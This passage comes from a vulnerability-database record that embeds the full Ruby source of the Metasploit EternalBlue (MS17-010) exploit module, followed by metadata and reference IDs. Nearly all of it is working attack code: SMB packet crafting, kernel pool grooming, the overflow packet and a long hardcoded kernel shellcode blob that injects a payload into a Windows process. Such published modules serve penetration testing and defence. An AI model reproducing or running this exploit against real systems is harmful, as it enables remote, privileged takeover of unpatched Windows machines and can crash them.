get hot streaks\n and need a cool down period before the shells rain in again.\n\n The module will attempt to use Anonymous login, by default, to authenticate to perform the\n exploit. 
If the user supplies credentials in the SMBUser, SMBPass, and SMBDomain options it will use\n those instead.\n\n On some systems, this module may cause system instability and crashes, such as a BSOD or\n a reboot. This may be more likely with some payloads.\n },\n\n 'Author' => [\n 'Sean Dillon <sean.dillon@risksense.com>', # @zerosum0x0\n 'Dylan Davis <dylan.davis@risksense.com>', # @jennamagius\n 'Equation Group',\n 'Shadow Brokers',\n 'thelightcosine' # RubySMB refactor and Fallback Credential mode\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'AKA', 'ETERNALBLUE' ],\n [ 'MSB', 'MS17-010' ],\n [ 'CVE', '2017-0143' ],\n [ 'CVE', '2017-0144' ],\n [ 'CVE', '2017-0145' ],\n [ 'CVE', '2017-0146' ],\n [ 'CVE', '2017-0147' ],\n [ 'CVE', '2017-0148' ],\n [ 'URL', 'https://github.com/RiskSense-Ops/MS17-010' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n 'WfsDelay' => 5,\n },\n 'Privileged' => true,\n 'Payload' =>\n {\n 'Space' => 2000, # this can be more, needs to be recalculated\n 'EncoderType' => Msf::Encoder::Type::Raw,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows 7 and Server 2008 R2 (x64) All Service Packs',\n {\n 'Platform' => 'win',\n 'Arch' => [ ARCH_X64 ],\n\n 'os_patterns' => ['Server 2008 R2', 'Windows 7'],\n 'ep_thl_b' => 0x308, # EPROCESS.ThreadListHead.Blink offset\n 'et_alertable' => 0x4c, # ETHREAD.Alertable offset\n 'teb_acp' => 0x2c8, # TEB.ActivationContextPointer offset\n 'et_tle' => 0x420 # ETHREAD.ThreadListEntry offset\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Mar 14 2017'\n ))\n\n register_options(\n [\n Opt::RPORT(445),\n OptString.new('ProcessName', [ true, 'Process to inject payload into.', 'spoolsv.exe' ]),\n OptInt.new( 'MaxExploitAttempts', [ true, \"The number of times to retry the exploit.\", 3 ] ),\n OptInt.new( 'GroomAllocations', [ true, \"Initial number of times to groom the kernel pool.\", 12 ] ),\n OptInt.new( 'GroomDelta', [ true, \"The amount to increase the groom count 
by per try.\", 5 ] ),\n OptBool.new( 'VerifyTarget', [ true, \"Check if remote OS matches exploit Target.\", true ] ),\n OptBool.new( 'VerifyArch', [ true, \"Check if remote architecture matches exploit Target.\", true ] ),\n OptString.new('SMBUser', [ false, '(Optional) The username to authenticate as', '']),\n OptString.new('SMBPass', [ false, '(Optional) The password for the specified username', '']),\n OptString.new('SMBDomain', [ false, '(Optional) The Windows domain to use for authentication', '.']),\n ])\n end\n\n class EternalBlueError < StandardError\n end\n\n def check\n # todo: create MS17-010 mixin, and hook up auxiliary/scanner/smb/smb_ms17_010\n end\n\n def exploit\n begin\n for i in 1..datastore['MaxExploitAttempts']\n\n grooms = datastore['GroomAllocations'] + datastore['GroomDelta'] * (i - 1)\n\n smb_eternalblue(datastore['ProcessName'], grooms)\n\n # we don't need this sleep, and need to find a way to remove it\n # problem is session_count won't increment until stage is complete :\\\n secs = 0\n while !session_created? and secs < 30\n secs += 1\n sleep 1\n end\n\n if session_created?\n print_good(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\n print_good(\"=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\n print_good(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\n break\n else\n print_bad(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\n print_bad(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\n print_bad(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\n end\n end\n\n rescue EternalBlueError => e\n print_error(\"#{e.message}\")\n return false\n rescue ::RubySMB::Error::NegotiationFailure\n print_error(\"SMB Negotiation Failure -- this often occurs when lsass crashes. 
The target may reboot in 60 seconds.\")\n return false\n rescue ::RubySMB::Error::UnexpectedStatusCode,\n ::Errno::ECONNRESET,\n ::Rex::HostUnreachable,\n ::Rex::ConnectionTimeout,\n ::Rex::ConnectionRefused,\n ::RubySMB::Error::CommunicationError => e\n print_error(\"#{e.class}: #{e.message}\")\n report_failure\n return false\n rescue => error\n print_error(error.class.to_s)\n print_error(error.message)\n print_error(error.backtrace.join(\"\\n\"))\n return false\n ensure\n # pass\n end\n end\n\n def smb_eternalblue(process_name, grooms)\n begin\n # Step 0: pre-calculate what we can\n shellcode = make_kernel_user_payload(payload.encode, 0, 0, 0, 0, 0)\n payload_hdr_pkt = make_smb2_payload_headers_packet\n payload_body_pkt = make_smb2_payload_body_packet(shellcode)\n\n # Step 1: Connect to IPC$ share\n print_status(\"Connecting to target for exploitation.\")\n client, tree, sock, os = smb1_anonymous_connect_ipc()\n rescue RubySMB::Error::CommunicationError\n # Error handler in case SMBv1 disabled on target\n raise EternalBlueError, 'Could not make SMBv1 connection'\n else\n print_good(\"Connection established for exploitation.\")\n\n if verify_target(os)\n print_good('Target OS selected valid for OS indicated by SMB reply')\n else\n print_warning('Target OS selected not valid for OS indicated by SMB reply')\n print_warning('Disable VerifyTarget option to proceed manually...')\n raise EternalBlueError, 'Unable to continue with improper OS Target.'\n end\n\n # cool buffer print no matter what, will be helpful when people post debug issues\n print_core_buffer(os)\n\n if verify_arch\n print_good('Target arch selected valid for arch indicated by DCE/RPC reply')\n else\n print_warning('Target arch selected not valid for arch indicated by DCE/RPC reply')\n print_warning('Disable VerifyArch option to proceed manually...')\n raise EternalBlueError, 'Unable to continue with improper OS Arch.'\n end\n\n print_status(\"Trying exploit with #{grooms} Groom Allocations.\")\n\n # 
Step 2: Create a large SMB1 buffer\n print_status(\"Sending all but last fragment of exploit packet\")\n smb1_large_buffer(client, tree, sock)\n\n # Step 3: Groom the pool with payload packets, and open/close SMB1 packets\n print_status(\"Starting non-paged pool grooming\")\n\n # initialize_groom_threads(ip, port, payload, grooms)\n fhs_sock = smb1_free_hole(true)\n\n @groom_socks = []\n\n print_good(\"Sending SMBv2 buffers\")\n smb2_grooms(grooms, payload_hdr_pkt)\n\n fhf_sock = smb1_free_hole(false)\n\n print_good(\"Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.\")\n fhs_sock.shutdown()\n\n print_status(\"Sending final SMBv2 buffers.\") # 6x\n smb2_grooms(6, payload_hdr_pkt) # todo: magic #\n\n fhf_sock.shutdown()\n\n print_status(\"Sending last fragment of exploit packet!\")\n final_exploit_pkt = make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_exploit, 15)\n sock.put(final_exploit_pkt)\n\n print_status(\"Receiving response from exploit packet\")\n code, raw = smb1_get_response(sock)\n\n code_str = \"0x\" + code.to_i.to_s(16).upcase\n if code.nil?\n print_error(\"Did not receive a response from exploit packet\")\n elsif code == 0xc000000d # STATUS_INVALID_PARAMETER (0xC000000D)\n print_good(\"ETERNALBLUE overwrite completed successfully (#{code_str})!\")\n else\n print_warning(\"ETERNALBLUE overwrite returned unexpected status code (#{code_str})!\")\n end\n\n # Step 4: Send the payload\n print_status(\"Sending egg to corrupted connection.\")\n\n @groom_socks.each{ |gsock| gsock.put(payload_body_pkt.first(2920)) }\n @groom_socks.each{ |gsock| gsock.put(payload_body_pkt[2920..(4204 - 0x84)]) }\n\n print_status(\"Triggering free of corrupted buffer.\")\n # tree disconnect\n # logoff and x\n # note: these aren't necessary, just close the sockets\n return true\n ensure\n abort_sockets\n end\n end\n\n def verify_target(os)\n os = os.gsub(\"\\x00\", '') # strip unicode bs\n os << \"\\x00\" # but original has a null\n ret = 
true\n\n if datastore['VerifyTarget']\n ret = false\n # search if its in patterns\n target['os_patterns'].each do |pattern|\n if os.downcase.include? pattern.downcase\n ret = true\n break\n end\n end\n end\n\n return ret\n end\n\n def verify_arch\n return true unless datastore['VerifyArch']\n (dcerpc_getarch == target_arch.first) ? true : false\n end\n\n def print_core_buffer(os)\n print_status(\"CORE raw buffer dump (#{os.length.to_s} bytes)\")\n\n count = 0\n chunks = os.scan(/.{1,16}/)\n chunks.each do | chunk |\n hexdump = chunk.chars.map { |ch| ch.ord.to_s(16).rjust(2, \"0\") }.join(\" \")\n\n format = \"0x%08x %-47s %-16s\" % [(count * 16), hexdump, chunk]\n print_status(format)\n count += 1\n end\n end\n\n '''\n #\n # Increase the default delay by five seconds since some kernel-mode\n # payloads may not run immediately.\n #\n def wfs_delay\n super + 5\n end\n '''\n\n def smb2_grooms(grooms, payload_hdr_pkt)\n grooms.times do |groom_id|\n gsock = connect(false)\n @groom_socks << gsock\n gsock.put(payload_hdr_pkt)\n end\n end\n\n def smb1_anonymous_connect_ipc\n sock = connect(false)\n dispatcher = RubySMB::Dispatcher::Socket.new(sock)\n client = RubySMB::Client.new(dispatcher, smb1: true, smb2: false, username: smb_user, password: smb_pass)\n response_code = client.login\n\n unless response_code == ::WindowsError::NTStatus::STATUS_SUCCESS\n raise RubySMB::Error::UnexpectedStatusCode, \"Error with login: #{response_code.to_s}\"\n end\n os = client.peer_native_os\n\n tree = client.tree_connect(\"\\\\\\\\#{datastore['RHOST']}\\\\IPC$\")\n\n return client, tree, sock, os\n end\n\n def smb1_large_buffer(client, tree, sock)\n nt_trans_pkt = make_smb1_nt_trans_packet(tree.id, client.user_id)\n\n # send NT Trans\n vprint_status(\"Sending NT Trans Request packet\")\n\n client.send_recv(nt_trans_pkt)\n # Initial Trans2 request\n trans2_pkt_nulled = make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_zero, 0)\n\n # send all but last packet\n for i in 
1..14\n trans2_pkt_nulled << make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_buffer, i)\n end\n\n vprint_status(\"Sending malformed Trans2 packets\")\n sock.put(trans2_pkt_nulled)\n\n begin\n sock.get_once\n rescue EOFError\n vprint_error(\"No response back from SMB echo request. Continuing anyway...\")\n end\n\n client.echo(count:1, data: \"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x00\")\n end\n\n def smb1_free_hole(start)\n sock = connect(false)\n dispatcher = RubySMB::Dispatcher::Socket.new(sock)\n client = RubySMB::Client.new(dispatcher, smb1: true, smb2: false, username: smb_user, password: smb_pass)\n client.negotiate\n\n pkt = \"\"\n\n if start\n vprint_status(\"Sending start free hole packet.\")\n pkt = make_smb1_free_hole_session_packet(\"\\x07\\xc0\", \"\\x2d\\x01\", \"\\xf0\\xff\\x00\\x00\\x00\")\n else\n vprint_status(\"Sending end free hole packet.\")\n pkt = make_smb1_free_hole_session_packet(\"\\x07\\x40\", \"\\x2c\\x01\", \"\\xf8\\x87\\x00\\x00\\x00\")\n end\n\n client.send_recv(pkt)\n sock\n end\n\n def smb1_get_response(sock)\n raw = nil\n\n # dirty hack since it doesn't always like to reply the first time...\n 16.times do\n raw = sock.get_once\n break unless raw.nil? 
or raw.empty?\n end\n\n return nil unless raw\n response = RubySMB::SMB1::SMBHeader.read(raw[4..-1])\n code = response.nt_status\n return code, raw, response\n end\n\n def make_smb2_payload_headers_packet\n # don't need a library here, the packet is essentially nonsensical\n pkt = \"\"\n pkt << \"\\x00\" # session message\n pkt << \"\\x00\\xff\\xf7\" # size\n pkt << \"\\xfeSMB\" # SMB2\n pkt << \"\\x00\" * 124\n\n pkt\n end\n\n def make_smb2_payload_body_packet(kernel_user_payload)\n # precalculated lengths\n pkt_max_len = 4204\n pkt_setup_len = 497\n pkt_max_payload = pkt_max_len - pkt_setup_len # 3575\n\n # this packet holds padding, KI_USER_SHARED_DATA addresses, and shellcode\n pkt = \"\"\n\n # padding\n pkt << \"\\x00\" * 0x8\n pkt << \"\\x03\\x00\\x00\\x00\"\n pkt << \"\\x00\" * 0x1c\n pkt << \"\\x03\\x00\\x00\\x00\"\n pkt << \"\\x00\" * 0x74\n\n # KI_USER_SHARED_DATA addresses\n pkt << \"\\xb0\\x00\\xd0\\xff\\xff\\xff\\xff\\xff\" * 2 # x64 address\n pkt << \"\\x00\" * 0x10\n pkt << \"\\xc0\\xf0\\xdf\\xff\" * 2 # x86 address\n pkt << \"\\x00\" * 0xc4\n\n # payload addreses\n pkt << \"\\x90\\xf1\\xdf\\xff\"\n pkt << \"\\x00\" * 0x4\n pkt << \"\\xf0\\xf1\\xdf\\xff\"\n pkt << \"\\x00\" * 0x40\n\n pkt << \"\\xf0\\x01\\xd0\\xff\\xff\\xff\\xff\\xff\"\n pkt << \"\\x00\" * 0x8\n pkt << \"\\x00\\x02\\xd0\\xff\\xff\\xff\\xff\\xff\"\n pkt << \"\\x00\"\n\n pkt << kernel_user_payload\n\n # fill out the rest, this can be randomly generated\n pkt << \"\\x00\" * (pkt_max_payload - kernel_user_payload.length)\n\n pkt\n end\n\n # Type can be :eb_trans2_zero, :eb_trans2_buffer, or :eb_trans2_exploit\n def make_smb1_trans2_exploit_packet(tree_id, user_id, type, timeout)\n timeout = (timeout * 0x10) + 3\n timeout_value = \"\\x35\\x00\\xd0\" + timeout.chr\n\n packet = RubySMB::SMB1::Packet::Trans2::Request.new\n packet = set_smb1_headers(packet,tree_id,user_id)\n\n # The packets are labeled as Secondary Requests but are actually structured\n # as normal Trans2 Requests for some 
reason. We shall similarly cheat here.\n packet.smb_header.command = RubySMB::SMB1::Commands::SMB_COM_TRANSACTION2_SECONDARY\n\n packet.parameter_block.flags.read(\"\\x00\\x10\")\n packet.parameter_block.timeout.read(timeout_value)\n\n packet.parameter_block.word_count = 9\n packet.parameter_block.total_data_count = 4096\n packet.parameter_block.parameter_count = 4096\n\n nbss = \"\\x00\\x00\\x10\\x35\"\n pkt = packet.to_binary_s\n pkt = pkt[0,packet.parameter_block.parameter_offset.abs_offset]\n pkt = nbss + pkt\n\n case type\n when :eb_trans2_exploit\n vprint_status(\"Making :eb_trans2_exploit packet\")\n\n pkt << \"\\x41\" * 2957\n\n pkt << \"\\x80\\x00\\xa8\\x00\" # overflow\n\n pkt << \"\\x00\" * 0x10\n pkt << \"\\xff\\xff\"\n pkt << \"\\x00\" * 0x6\n pkt << \"\\xff\\xff\"\n pkt << \"\\x00\" * 0x16\n\n pkt << \"\\x00\\xf1\\xdf\\xff\" # x86 addresses\n pkt << \"\\x00\" * 0x8\n pkt << \"\\x20\\xf0\\xdf\\xff\"\n\n pkt << \"\\x00\\xf1\\xdf\\xff\\xff\\xff\\xff\\xff\" # x64\n\n pkt << \"\\x60\\x00\\x04\\x10\"\n pkt << \"\\x00\" * 4\n\n pkt << \"\\x80\\xef\\xdf\\xff\"\n\n pkt << \"\\x00\" * 4\n pkt << \"\\x10\\x00\\xd0\\xff\\xff\\xff\\xff\\xff\"\n pkt << \"\\x18\\x01\\xd0\\xff\\xff\\xff\\xff\\xff\"\n pkt << \"\\x00\" * 0x10\n\n pkt << \"\\x60\\x00\\x04\\x10\"\n pkt << \"\\x00\" * 0xc\n pkt << \"\\x90\\xff\\xcf\\xff\\xff\\xff\\xff\\xff\"\n pkt << \"\\x00\" * 0x8\n pkt << \"\\x80\\x10\"\n pkt << \"\\x00\" * 0xe\n pkt << \"\\x39\"\n pkt << \"\\xbb\"\n\n pkt << \"\\x41\" * 965\n when :eb_trans2_zero\n vprint_status(\"Making :eb_trans2_zero packet\")\n pkt << \"\\x00\" * 2055\n pkt << \"\\x83\\xf3\"\n pkt << \"\\x41\" * 2039\n else\n vprint_status(\"Making :eb_trans2_buffer packet\")\n pkt << \"\\x41\" * 4096\n end\n pkt\n end\n\n def make_smb1_nt_trans_packet(tree_id, user_id)\n packet = RubySMB::SMB1::Packet::NtTrans::Request.new\n\n # Disable the automatic padding because it will distort\n # our values here.\n packet.data_block.enable_padding = false\n\n packet = 
set_smb1_headers(packet,tree_id,user_id)\n\n packet.parameter_block.max_setup_count = 1\n packet.parameter_block.total_parameter_count = 30\n packet.parameter_block.total_data_count = 66512\n packet.parameter_block.max_parameter_count = 30\n packet.parameter_block.max_data_count = 0\n packet.parameter_block.parameter_count = 30\n packet.parameter_block.parameter_offset = 75\n packet.parameter_block.data_count = 976\n packet.parameter_block.data_offset = 104\n packet.parameter_block.function = 0\n\n packet.parameter_block.setup << 0x0000\n\n packet.data_block.byte_count = 1004\n packet.data_block.trans2_parameters = \"\\x00\" * 31 + \"\\x01\" + ( \"\\x00\" * 973 )\n packet\n end\n\n def make_smb1_free_hole_session_packet(flags2, vcnum, native_os)\n packet = RubySMB::SMB1::Packet::SessionSetupRequest.new\n\n packet.smb_header.flags.read(\"\\x18\")\n packet.smb_header.flags2.read(flags2)\n packet.smb_header.pid_high = 65279\n packet.smb_header.mid = 64\n\n packet.parameter_block.vc_number.read(vcnum)\n packet.parameter_block.max_buffer_size = 4356\n packet.parameter_block.max_mpx_count = 10\n packet.parameter_block.security_blob_length = 0\n\n packet.data_block.native_os = native_os\n packet.data_block.native_lan_man = \"\\x00\" * 17\n packet\n end\n\n # ring3 = user mode encoded payload\n # proc_name = process to inject APC into\n # ep_thl_b = EPROCESS.ThreadListHead.Blink offset\n # et_alertable = ETHREAD.Alertable offset\n # teb_acp = TEB.ActivationContextPointer offset\n # et_tle = ETHREAD.ThreadListEntry offset\n def make_kernel_user_payload(ring3, proc_name, ep_thl_b, et_alertable, teb_acp, et_tle)\n sc = make_kernel_shellcode\n sc << [ring3.length].pack(\"S<\")\n sc << ring3\n sc\n end\n\n def make_kernel_shellcode\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n # Length: 1019 bytes\n\n #\"\\xcc\"+\n \"\\x31\\xC9\\x41\\xE2\\x01\\xC3\\xB9\\x82\\x00\\x00\\xC0\\x0F\\x32\\x48\\xBB\\xF8\" +\n 
\"\\x0F\\xD0\\xFF\\xFF\\xFF\\xFF\\xFF\\x89\\x53\\x04\\x89\\x03\\x48\\x8D\\x05\\x0A\" +\n \"\\x00\\x00\\x00\\x48\\x89\\xC2\\x48\\xC1\\xEA\\x20\\x0F\\x30\\xC3\\x0F\\x01\\xF8\" +\n \"\\x65\\x48\\x89\\x24\\x25\\x10\\x00\\x00\\x00\\x65\\x48\\x8B\\x24\\x25\\xA8\\x01\" +\n \"\\x00\\x00\\x50\\x53\\x51\\x52\\x56\\x57\\x55\\x41\\x50\\x41\\x51\\x41\\x52\\x41\" +\n \"\\x53\\x41\\x54\\x41\\x55\\x41\\x56\\x41\\x57\\x6A\\x2B\\x65\\xFF\\x34\\x25\\x10\" +\n \"\\x00\\x00\\x00\\x41\\x53\\x6A\\x33\\x51\\x4C\\x89\\xD1\\x48\\x83\\xEC\\x08\\x55\" +\n \"\\x48\\x81\\xEC\\x58\\x01\\x00\\x00\\x48\\x8D\\xAC\\x24\\x80\\x00\\x00\\x00\\x48\" +\n \"\\x89\\x9D\\xC0\\x00\\x00\\x00\\x48\\x89\\xBD\\xC8\\x00\\x00\\x00\\x48\\x89\\xB5\" +\n \"\\xD0\\x00\\x00\\x00\\x48\\xA1\\xF8\\x0F\\xD0\\xFF\\xFF\\xFF\\xFF\\xFF\\x48\\x89\" +\n \"\\xC2\\x48\\xC1\\xEA\\x20\\x48\\x31\\xDB\\xFF\\xCB\\x48\\x21\\xD8\\xB9\\x82\\x00\" +\n \"\\x00\\xC0\\x0F\\x30\\xFB\\xE8\\x38\\x00\\x00\\x00\\xFA\\x65\\x48\\x8B\\x24\\x25\" +\n \"\\xA8\\x01\\x00\\x00\\x48\\x83\\xEC\\x78\\x41\\x5F\\x41\\x5E\\x41\\x5D\\x41\\x5C\" +\n \"\\x41\\x5B\\x41\\x5A\\x41\\x59\\x41\\x58\\x5D\\x5F\\x5E\\x5A\\x59\\x5B\\x58\\x65\" +\n \"\\x48\\x8B\\x24\\x25\\x10\\x00\\x00\\x00\\x0F\\x01\\xF8\\xFF\\x24\\x25\\xF8\\x0F\" +\n \"\\xD0\\xFF\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\\x55\\x48\\x89\\xE5\" +\n \"\\x66\\x83\\xE4\\xF0\\x48\\x83\\xEC\\x20\\x4C\\x8D\\x35\\xE3\\xFF\\xFF\\xFF\\x65\" +\n \"\\x4C\\x8B\\x3C\\x25\\x38\\x00\\x00\\x00\\x4D\\x8B\\x7F\\x04\\x49\\xC1\\xEF\\x0C\" +\n \"\\x49\\xC1\\xE7\\x0C\\x49\\x81\\xEF\\x00\\x10\\x00\\x00\\x49\\x8B\\x37\\x66\\x81\" +\n \"\\xFE\\x4D\\x5A\\x75\\xEF\\x41\\xBB\\x5C\\x72\\x11\\x62\\xE8\\x18\\x02\\x00\\x00\" +\n \"\\x48\\x89\\xC6\\x48\\x81\\xC6\\x08\\x03\\x00\\x00\\x41\\xBB\\x7A\\xBA\\xA3\\x30\" +\n \"\\xE8\\x03\\x02\\x00\\x00\\x48\\x89\\xF1\\x48\\x39\\xF0\\x77\\x11\\x48\\x8D\\x90\" +\n \"\\x00\\x05\\x00\\x00\\x48\\x39\\xF2\\x72\\x05\\x48\\x29\\xC6\\xEB\\x08\\x48\\x8B\" +\n 
\"\\x36\\x48\\x39\\xCE\\x75\\xE2\\x49\\x89\\xF4\\x31\\xDB\\x89\\xD9\\x83\\xC1\\x04\" +\n \"\\x81\\xF9\\x00\\x00\\x01\\x00\\x0F\\x8D\\x66\\x01\\x00\\x00\\x4C\\x89\\xF2\\x89\" +\n \"\\xCB\\x41\\xBB\\x66\\x55\\xA2\\x4B\\xE8\\xBC\\x01\\x00\\x00\\x85\\xC0\\x75\\xDB\" +\n \"\\x49\\x8B\\x0E\\x41\\xBB\\xA3\\x6F\\x72\\x2D\\xE8\\xAA\\x01\\x00\\x00\\x48\\x89\" +\n \"\\xC6\\xE8\\x50\\x01\\x00\\x00\\x41\\x81\\xF9\\xBF\\x77\\x1F\\xDD\\x75\\xBC\\x49\" +\n \"\\x8B\\x1E\\x4D\\x8D\\x6E\\x10\\x4C\\x89\\xEA\\x48\\x89\\xD9\\x41\\xBB\\xE5\\x24\" +\n \"\\x11\\xDC\\xE8\\x81\\x01\\x00\\x00\\x6A\\x40\\x68\\x00\\x10\\x00\\x00\\x4D\\x8D\" +\n \"\\x4E\\x08\\x49\\xC7\\x01\\x00\\x10\\x00\\x00\\x4D\\x31\\xC0\\x4C\\x89\\xF2\\x31\" +\n \"\\xC9\\x48\\x89\\x0A\\x48\\xF7\\xD1\\x41\\xBB\\x4B\\xCA\\x0A\\xEE\\x48\\x83\\xEC\" +\n \"\\x20\\xE8\\x52\\x01\\x00\\x00\\x85\\xC0\\x0F\\x85\\xC8\\x00\\x00\\x00\\x49\\x8B\" +\n \"\\x3E\\x48\\x8D\\x35\\xE9\\x00\\x00\\x00\\x31\\xC9\\x66\\x03\\x0D\\xD7\\x01\\x00\" +\n \"\\x00\\x66\\x81\\xC1\\xF9\\x00\\xF3\\xA4\\x48\\x89\\xDE\\x48\\x81\\xC6\\x08\\x03\" +\n \"\\x00\\x00\\x48\\x89\\xF1\\x48\\x8B\\x11\\x4C\\x29\\xE2\\x51\\x52\\x48\\x89\\xD1\" +\n \"\\x48\\x83\\xEC\\x20\\x41\\xBB\\x26\\x40\\x36\\x9D\\xE8\\x09\\x01\\x00\\x00\\x48\" +\n \"\\x83\\xC4\\x20\\x5A\\x59\\x48\\x85\\xC0\\x74\\x18\\x48\\x8B\\x80\\xC8\\x02\\x00\" +\n \"\\x00\\x48\\x85\\xC0\\x74\\x0C\\x48\\x83\\xC2\\x4C\\x8B\\x02\\x0F\\xBA\\xE0\\x05\" +\n \"\\x72\\x05\\x48\\x8B\\x09\\xEB\\xBE\\x48\\x83\\xEA\\x4C\\x49\\x89\\xD4\\x31\\xD2\" +\n \"\\x80\\xC2\\x90\\x31\\xC9\\x41\\xBB\\x26\\xAC\\x50\\x91\\xE8\\xC8\\x00\\x00\\x00\" +\n \"\\x48\\x89\\xC1\\x4C\\x8D\\x89\\x80\\x00\\x00\\x00\\x41\\xC6\\x01\\xC3\\x4C\\x89\" +\n \"\\xE2\\x49\\x89\\xC4\\x4D\\x31\\xC0\\x41\\x50\\x6A\\x01\\x49\\x8B\\x06\\x50\\x41\" +\n \"\\x50\\x48\\x83\\xEC\\x20\\x41\\xBB\\xAC\\xCE\\x55\\x4B\\xE8\\x98\\x00\\x00\\x00\" +\n \"\\x31\\xD2\\x52\\x52\\x41\\x58\\x41\\x59\\x4C\\x89\\xE1\\x41\\xBB\\x18\\x38\\x09\" +\n 
\"\\x9E\\xE8\\x82\\x00\\x00\\x00\\x4C\\x89\\xE9\\x41\\xBB\\x22\\xB7\\xB3\\x7D\\xE8\" +\n \"\\x74\\x00\\x00\\x00\\x48\\x89\\xD9\\x41\\xBB\\x0D\\xE2\\x4D\\x85\\xE8\\x66\\x00\" +\n \"\\x00\\x00\\x48\\x89\\xEC\\x5D\\x5B\\x41\\x5C\\x41\\x5D\\x41\\x5E\\x41\\x5F\\x5E\" +\n \"\\xC3\\xE9\\xB5\\x00\\x00\\x00\\x4D\\x31\\xC9\\x31\\xC0\\xAC\\x41\\xC1\\xC9\\x0D\" +\n \"\\x3C\\x61\\x7C\\x02\\x2C\\x20\\x41\\x01\\xC1\\x38\\xE0\\x75\\xEC\\xC3\\x31\\xD2\" +\n \"\\x65\\x48\\x8B\\x52\\x60\\x48\\x8B\\x52\\x18\\x48\\x8B\\x52\\x20\\x48\\x8B\\x12\" +\n \"\\x48\\x8B\\x72\\x50\\x48\\x0F\\xB7\\x4A\\x4A\\x45\\x31\\xC9\\x31\\xC0\\xAC\\x3C\" +\n \"\\x61\\x7C\\x02\\x2C\\x20\\x41\\xC1\\xC9\\x0D\\x41\\x01\\xC1\\xE2\\xEE\\x45\\x39\" +\n \"\\xD9\\x75\\xDA\\x4C\\x8B\\x7A\\x20\\xC3\\x4C\\x89\\xF8\\x41\\x51\\x41\\x50\\x52\" +\n \"\\x51\\x56\\x48\\x89\\xC2\\x8B\\x42\\x3C\\x48\\x01\\xD0\\x8B\\x80\\x88\\x00\\x00\" +\n \"\\x00\\x48\\x01\\xD0\\x50\\x8B\\x48\\x18\\x44\\x8B\\x40\\x20\\x49\\x01\\xD0\\x48\" +\n \"\\xFF\\xC9\\x41\\x8B\\x34\\x88\\x48\\x01\\xD6\\xE8\\x78\\xFF\\xFF\\xFF\\x45\\x39\" +\n \"\\xD9\\x75\\xEC\\x58\\x44\\x8B\\x40\\x24\\x49\\x01\\xD0\\x66\\x41\\x8B\\x0C\\x48\" +\n \"\\x44\\x8B\\x40\\x1C\\x49\\x01\\xD0\\x41\\x8B\\x04\\x88\\x48\\x01\\xD0\\x5E\\x59\" +\n \"\\x5A\\x41\\x58\\x41\\x59\\x41\\x5B\\x41\\x53\\xFF\\xE0\\x56\\x41\\x57\\x55\\x48\" +\n \"\\x89\\xE5\\x48\\x83\\xEC\\x20\\x41\\xBB\\xDA\\x16\\xAF\\x92\\xE8\\x4D\\xFF\\xFF\" +\n \"\\xFF\\x31\\xC9\\x51\\x51\\x51\\x51\\x41\\x59\\x4C\\x8D\\x05\\x1A\\x00\\x00\\x00\" +\n \"\\x5A\\x48\\x83\\xEC\\x20\\x41\\xBB\\x46\\x45\\x1B\\x22\\xE8\\x68\\xFF\\xFF\\xFF\" +\n \"\\x48\\x89\\xEC\\x5D\\x41\\x5F\\x5E\\xC3\"#\\x01\\x00\\xC3\"\n\n end\n\n # Sets common SMB1 Header values used by the various\n # packets in the exploit.\n #\n # @return [RubySMB::GenericPacket] the modified version of the packet\n def set_smb1_headers(packet,tree_id,user_id)\n packet.smb_header.flags2.read(\"\\x07\\xc0\")\n packet.smb_header.tid = tree_id\n packet.smb_header.uid = user_id\n 
packet.smb_header.pid_low = 65279\n packet.smb_header.mid = 64\n packet\n end\n\n\n # Returns the value to be passed to SMB clients for\n # the password. If the user has not supplied a password\n # it returns an empty string to trigger an anonymous\n # logon.\n #\n # @return [String] the password value\n def smb_pass\n if datastore['SMBPass'].present?\n datastore['SMBPass']\n else\n ''\n end\n end\n\n # Returns the value to be passed to SMB clients for\n # the username. If the user has not supplied a username\n # it returns an empty string to trigger an anonymous\n # logon.\n #\n # @return [String] the username value\n def smb_user\n if datastore['SMBUser'].present?\n datastore['SMBUser']\n else\n ''\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/smb/ms17_010_eternalblue.rb", "title": "MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption", "type": "metasploit", "viewCount": 1542}, "differentElements": ["published", "modified"], "edition": 29, "lastseen": "2018-04-14T18:18:58"}], "viewCount": 6064, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", 